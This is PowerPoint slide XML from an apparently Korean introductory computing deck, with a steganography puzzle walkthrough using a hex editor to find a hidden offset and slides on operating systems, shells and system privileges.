                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70DC7CA-E832-42C9-9511-4CA27DD53942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6531417" y="5675328"/>
            <a:ext cx="5124450" cy="552450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C145E8-981A-4621-BA28-65D83AB339E3}"/>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ADF7000F-66EC-4B3E-AE55-D285EABF87D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28AD8121-9933-463F-92A8-ABE7B5D90F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B8CC5968-5E8B-43AF-9BAB-CA9A1EF889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3395777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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 열어본다</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D6D14B19-5D59-4321-AAF7-50F39727A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468" y="884706"/>
            <a:ext cx="2324100" cy="1971675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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058668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57F89BD-CEA7-4D7A-8AE1-6854D0809743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="709321" y="2160765"/>
            <a:ext cx="7614084" cy="3553239"/>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steganography</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74" name="Picture 2" descr="Steganography: Introduction, Examples and Tools | CommonLounge">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B100D475-06FE-4B39-8B8C-545D86FAC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4849" y="2462916"/>
            <a:ext cx="2798951" cy="24584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teganography: Hiding an image inside another | by Kelvin Salton do Prado |  Towards Data Science">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54088135-0913-4FE1-84DF-4DE28ED8F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223" y="2160766"/>
            <a:ext cx="7580243" cy="355323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그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA31679D-437F-4795-B5E5-D89EE0BA4E61}"/>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0572CC51-E725-4970-A995-FFB4C34D210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D1453865-A68D-4977-AC30-132F29E384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F255078-D43B-4DD0-B2BC-06DA5690C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987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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Steganography</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얻은 자료를 성공적으로 복원지만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그냥 해군사관학교 마크가 아닌가</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어딘가 손상되어 보인다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숨겨진 메시지를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>찾으시오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스테가노그래피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8083359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dirty="0" err="1"/>
              <a:t>Hxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 파일을 열어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>맨 마지막 문자열을 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4848484849495548 offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 어떠한 내용을 숨겼다는 해커</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>그러나 그런 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>은 이 파일에 없었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>문득 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>48 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ascii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 특별하게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>값을 나타낸다는 사실이 생각났다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. Ascii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>문자열로 변환해보자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3. 00001170 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 변환되었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이 주소를 따라가보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. Ctrl + G </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 누르면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 점프할 수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4. Good job! Have A Nice Day!!</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8189ED2-FC50-449C-9E2E-91767622FCA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="519230" y="813601"/>
            <a:ext cx="5362575" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FFB78E-EC19-4CF6-A1E4-E0AA218C0AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="519230" y="2214561"/>
            <a:ext cx="5458895" cy="1562310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4671C937-69E6-41D1-97E8-CE5F00047BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6688445" y="813601"/>
            <a:ext cx="4606078" cy="2570659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E6AF402-611C-46B5-8155-D79223B18F57}"/>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6A12586-7854-4D0B-9810-690335E7C3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12905A7B-AE4D-4DF0-97B0-2ED13E42DE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91A44E6E-FD24-4FB8-A09A-139FA95A5C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8118382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운영체제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909654920"/>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컴퓨터기초</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>운영체제</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>• </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>운영체제</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>윈도우</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리눅스 운영체제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파일시스템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쉘</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시스템 권한</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875291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운영체제란</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descr="현재 가장 많이 사용되는 운영체제들 우리는 어떤 OS를 사용하고 있나.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79F3CB53-CE35-45D6-8F72-1E9A052B65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3808" y="1864822"/>
            <a:ext cx="7076662" cy="32449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DD380B7-9394-41FA-8BE6-378FB6FDC435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013791" y="5544590"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쉽게 활용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>으로 하드웨어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, ram …  )  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>사용하는것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138238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4" descr="CPU icon illustration - Free Image on 4 Free Photos">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB0DA20-62E4-4E23-BC52-189167F37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2014" y="5386261"/>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Shell</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61FCD34-BB00-4EA0-9C46-62CA3B7436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2832" y="2814758"/>
            <a:ext cx="4890210" cy="2752725"/>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7297074B-0EC2-4871-86C7-5540D9B22F58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973023" y="4468629"/>
            <a:ext cx="281465" cy="287862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{313DF6CB-3CBF-4B78-ABDE-9F1694173E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7957121" y="4788295"/>
            <a:ext cx="285750" cy="219075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8919090-A44D-4A15-B581-9AA18572443E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694521" y="4172680"/>
            <a:ext cx="262600" cy="390532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E377E7AE-F10B-4012-97FE-010827A13681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7996966" y="3858480"/>
            <a:ext cx="225048" cy="488675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E1B2A93-342D-4A60-804F-015B606C2FD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620180" y="3642230"/>
            <a:ext cx="262600" cy="368891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4F73E0-BD30-45D3-BB34-B8A87965955D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7644033" y="2846285"/>
            <a:ext cx="262600" cy="715166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="직선 화살표 연결선 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE1917B-2EAD-466B-B335-E2EDFF2CC4A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092564" y="3203868"/>
            <a:ext cx="55146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716FD16-8DF3-49F0-AD9D-31224F23B9B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7223864" y="3582698"/>
            <a:ext cx="78242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4A08B1D-96A1-4ACB-B2E1-A3FE45C9C338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344445" y="3826676"/>
            <a:ext cx="27573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4F0D0E02-1F8C-46F0-9308-CE59B3242929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7434470" y="4102818"/>
            <a:ext cx="56249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562FEF8E-CA85-4E5D-976E-42F01B477373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7544109" y="4367946"/>
            <a:ext cx="150412" cy="1101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B58585DC-938D-4739-A7F5-6C0067485C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7691775" y="4612560"/>
            <a:ext cx="28124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FCB00E5-8FE5-48BB-A645-B5CE7C521FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7856342" y="4897832"/>
            <a:ext cx="100779"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47" name="그림 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B545BA06-E3DE-4DCE-BC21-43958F43018C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038688" y="3318883"/>
            <a:ext cx="232223" cy="528308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="직선 화살표 연결선 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5815C8-FDCF-424E-BB55-AE5B764BC67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8222014" y="4101147"/>
            <a:ext cx="346771" cy="167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User (computing) - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4439D9FD-23A8-44AD-A581-FBAC10B123F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44391" y="1809488"/>
            <a:ext cx="858212" cy="858212"/>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직선 화살표 연결선 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FDEBFB0-27E9-4484-A692-2C3286276B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="2050" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2802603" y="2238594"/>
            <a:ext cx="1276416" cy="110510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59" name="그림 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3AEB64-5408-4A99-9C58-C69802E09F49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="442069" y="2752905"/>
            <a:ext cx="2861839" cy="1108367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="62" name="직선 화살표 연결선 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDA75D9-FE5D-463A-A381-1B4EEE00B7EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="59" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3303908" y="3307089"/>
            <a:ext cx="581604" cy="46571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25" name="그림 1024">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF5ACB4-D7B7-46E3-9429-EBE3C575C245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="424364" y="3922599"/>
            <a:ext cx="2864036" cy="682816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
